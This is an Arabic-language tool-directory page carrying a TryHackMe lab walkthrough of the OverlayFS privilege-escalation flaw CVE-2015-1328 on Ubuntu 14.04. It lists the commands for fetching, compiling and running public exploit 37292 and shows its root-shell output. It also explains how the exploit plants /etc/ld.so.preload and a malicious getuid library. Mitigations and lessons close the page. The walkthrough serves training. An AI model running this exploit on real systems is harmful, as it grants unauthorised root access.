Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-1328 — دليل خطوة بخطوة لاستغلال CVE-2015-1328 (OverlayFS) لتصعيد الامتيازات من مستخدم منخفض الصلاحيات إلى صلاحيات الجذر (root) على Ubuntu 14.04. يتضمن جمع المعلومات، وتجميع كود الاستغلال، وتنفيذه. | Kitploit
أدوات/GitHubGitHub/fernandocassiodev/cve-2015-1328
تصعيد الامتيازاتالاستغلالCTFالتعلم والتعليماستغلال الملفات الثنائيةمختبرات وتدريب عملي
GitHubfernandocassiodev/cve-2015-1328

CVE-2015-1328

دليل خطوة بخطوة لاستغلال CVE-2015-1328 (OverlayFS) لتصعيد الامتيازات من مستخدم منخفض الصلاحيات إلى صلاحيات الجذر (root) على Ubuntu 14.04. يتضمن جمع المعلومات، وتجميع كود الاستغلال، وتنفيذه.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ شهر واحدلم تتم المراجعة بعد

CVE-2015-1328

دليل TryHackMe العملي – تصعيد صلاحيات نواة لينكس (CVE-2015-1328)

الهدف

كان الهدف من هذا الدليل العملي هو تصعيد الصلاحيات من مستخدم بصلاحيات محدودة (karen) إلى المستخدم root عبر استغلال نواة لينكس معرّضة للثغرة.


الخطوة 1 – التعداد الأولي

بعد الاتصال بالجهاز الهدف عبر SSH:

root@kitploit:~
ssh karen@<target-ip>

تعرّفت على إصدار نواة لينكس:

root@kitploit:~
uname -r

النتيجة:

root@kitploit:~
3.13.0-24-generic

كان الجهاز يعمل بنظام Ubuntu 14.04 مع النواة 3.13.0-24-generic.


الخطوة 2 – البحث عن ثغرات النواة

بما أن تصعيد الصلاحيات في لينكس يعتمد غالبًا على النواة المعرّضة للثغرات، بحثت في Exploit-DB باستخدام SearchSploit:

root@kitploit:~
searchsploit overlayfs ubuntu 3.13

النتيجة:

root@kitploit:~
Linux Kernel 3.13.0 < 3.19 (Ubuntu...) - overlayfs Local Privilege Escalation
37292.c

يستهدف هذا الاستغلال CVE-2015-1328، الذي يؤثر على نوى Ubuntu الأقدم من الإصدارات المصحّحة.


الخطوة 3 – فهم الثغرة

قبل تنفيذ أي استغلال، من المهم فهم ما يفعله.

يستغل هذا الاستغلال خللًا في OverlayFS، وهو نظام الملفات الموحّد في لينكس.

توجد الثغرة لأن OverlayFS يتعامل بشكل غير صحيح مع صلاحيات الملفات عند تحميله داخل مساحة أسماء المستخدم (CLONE_NEWUSER).

يمكن لمستخدم بصلاحيات محدودة التلاعب بـ OverlayFS لإنشاء أو تعديل ملفات يجب أن تكون قابلة للكتابة من قبل root فقط.

يكتب الاستغلال في النهاية إلى:

root@kitploit:~
/etc/ld.so.preload

يخبر هذا الملف المُحمِّل الديناميكي في لينكس بتحميل مكتبة مشتركة قبل كل ملف تنفيذي مرتبط ديناميكيًا.

من خلال إجبار النظام على تحميل مكتبة مشتركة خبيثة، يحصل الاستغلال على تنفيذ كود بصلاحيات root.


الخطوة 4 – الحصول على الاستغلال

باستخدام SearchSploit:

root@kitploit:~
searchsploit -m 37292

هذا الأمر نسخ الاستغلال محليًا:

root@kitploit:~
37292.c

ثم تم نقل الاستغلال إلى الجهاز الضحية.

في هذا الدليل العملي، تم حفظه بالشكل:

root@kitploit:~
/tmp/ofs.c

الخطوة 5 – تجميع الاستغلال

انتقل إلى الدليل الذي يحتوي على الاستغلال:

root@kitploit:~
cd /tmp

قم بتجميعه باستخدام GCC:

root@kitploit:~
gcc ofs.c -o ofs

إذا نجحت عملية التجميع، فلن يُظهر GCC أي مخرجات.

تحقق من وجود الملف التنفيذي:

root@kitploit:~
ls -l

النتيجة المتوقعة:

root@kitploit:~
-rwxr-xr-x ... ofs

الخطوة 6 – تنفيذ الاستغلال

شغّل الملف التنفيذي:

root@kitploit:~
./ofs

يقوم الاستغلال بطباعة رسائل مشابهة لما يلي:

root@kitploit:~
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library

في النهاية، يقوم بإنشاء قشرة root:

root@kitploit:~
#

تحقق من الصلاحيات:

root@kitploit:~
id

النتيجة:

root@kitploit:~
uid=0(root) gid=0(root)

الخطوة 7 – استرجاع العلم

بعد الحصول على صلاحيات root:

root@kitploit:~
cat /home/matt/flag1.txt

أصبح بالإمكان قراءة الملف بنجاح الآن.


كيف يعمل الاستغلال

ينفذ الاستغلال عدة إجراءات داخليًا.

1. إنشاء مساحة أسماء مستخدم

root@kitploit:~
unshare(CLONE_NEWUSER);

تسمح مساحات أسماء المستخدم في لينكس لعملية بصلاحيات محدودة بأن تظهر كـ root داخل مساحة الأسماء، دون أن تكون root على المضيف.

هذه الإمكانية أساسية للهجوم.


2. إنشاء مساحة أسماء تحميل

root@kitploit:~
clone(... CLONE_NEWNS ...)

تقوم مساحة أسماء التحميل المنفصلة بعزل تغييرات نظام الملفات عن بقية نظام التشغيل.

يتيح ذلك للاستغلال تحميل OverlayFS دون التأثير على نظام الملفات العام.


3. تحميل OverlayFS

ينشئ الاستغلال أدلة مؤقتة:

root@kitploit:~
/tmp/ns_sploit/
├── upper/
├── work/
└── o/

ثم يقوم بتحميل OverlayFS:

root@kitploit:~
Lower Layer
      │
      ▼
OverlayFS
      │
      ▼
Upper Layer

بسبب ثغرة النواة، يسمح OverlayFS بشكل غير صحيح بعمليات كان يجب أن تتطلب صلاحيات root.


4. إنشاء /etc/ld.so.preload

يقوم الاستغلال بإعادة تسمية ملف قابل للكتابة داخل نقطة تحميل OverlayFS إلى:

root@kitploit:~
ld.so.preload

بعد إعادة تحميل OverlayFS فوق /etc، يصبح هذا الملف:

root@kitploit:~
/etc/ld.so.preload

في الوضع الطبيعي، يجب أن يكون root فقط قادرًا على إنشاء هذا الملف.


5. بناء مكتبة مشتركة خبيثة

يكتب الاستغلال ملف كود C:

root@kitploit:~
/tmp/ofs-lib.c

ثم يجمعه:

root@kitploit:~
gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c

تقوم المكتبة المشتركة الناتجة بتجاوز دالة getuid().


6. اختطاف المُحمِّل الديناميكي

يكتب الاستغلال:

root@kitploit:~
/tmp/ofs-lib.so

في:

root@kitploit:~
/etc/ld.so.preload

أصبح كل ملف تنفيذي مرتبط ديناميكيًا يقوم بتحميل هذه المكتبة الخبيثة قبل أي مكتبة نظام.


7. تنفيذ /bin/su

أخيرًا:

root@kitploit:~
execl("/bin/su", "su", NULL);

عند بدء تشغيل su، يتم تنفيذ دالة getuid() الخبيثة بدلاً من الأصلية.

تقوم المكتبة بـ:

  • إزالة /etc/ld.so.preload
  • حذف المكتبة المشتركة الخبيثة
  • استدعاء:
root@kitploit:~
setresuid(0,0,0);
setresgid(0,0,0);
  • تشغيل:
root@kitploit:~
/bin/sh

النتيجة هي قشرة root تفاعلية.


لماذا ينجح هذا

سبب الثغرة هو المعالجة غير الصحيحة للصلاحيات في OverlayFS عند استخدامه داخل مساحات أسماء المستخدم.

يمكن لمستخدم بصلاحيات محدودة التلاعب بـ OverlayFS لإنشاء ملفات ذات صلاحيات مميزة مثل:

root@kitploit:~
/etc/ld.so.preload

بما أن المُحمِّل الديناميكي يثق في هذا الملف، يتم تنفيذ كود تعسفي بصلاحيات root.


التخفيف

قامت Ubuntu بتصحيح هذه الثغرة في إصدارات النواة المحدّثة.

تشمل استراتيجيات التخفيف:

  • تحديث نواة لينكس إلى إصدار مصحّح.
  • تعطيل مساحات أسماء المستخدم غير المميزة عندما لا تكون مطلوبة.
  • تقييد استخدام OverlayFS.
  • تطبيق التحديثات الأمنية بانتظام.
  • مراقبة التعديلات غير المصرح بها على:
    • /etc/ld.so.preload
    • /etc/ld.so.cache

الدروس المستفادة

  • قم دائمًا بتعداد إصدار النواة أثناء تصعيد الصلاحيات في لينكس.
  • تحقق مما إذا كان إصدار النواة معرّضًا للثغرة قبل محاولة الاستغلال.
  • اقرأ وافهم كود الاستغلال قبل تنفيذه.
  • يمكن أن تؤدي استغلالات النواة مباشرة إلى صلاحيات root، ولكنها قد تتسبب أيضًا في تعطّل النظام الهدف.
  • في اختبارات الاختراق الواقعية، يجب محاولة استغلال النواة فقط عند الحصول على إذن صريح بسبب التأثير المحتمل على استقرار النظام.

الأوامر المستخدمة

root@kitploit:~
# Enumerate kernel version
uname -r

# Search for exploit
searchsploit overlayfs ubuntu 3.13

# Copy exploit locally
searchsploit -m 37292

# Compile exploit
gcc ofs.c -o ofs

# Execute exploit
./ofs

# Verify privileges
id

# Read flag
cat /home/matt/flag1.txt
تنزيل الأداة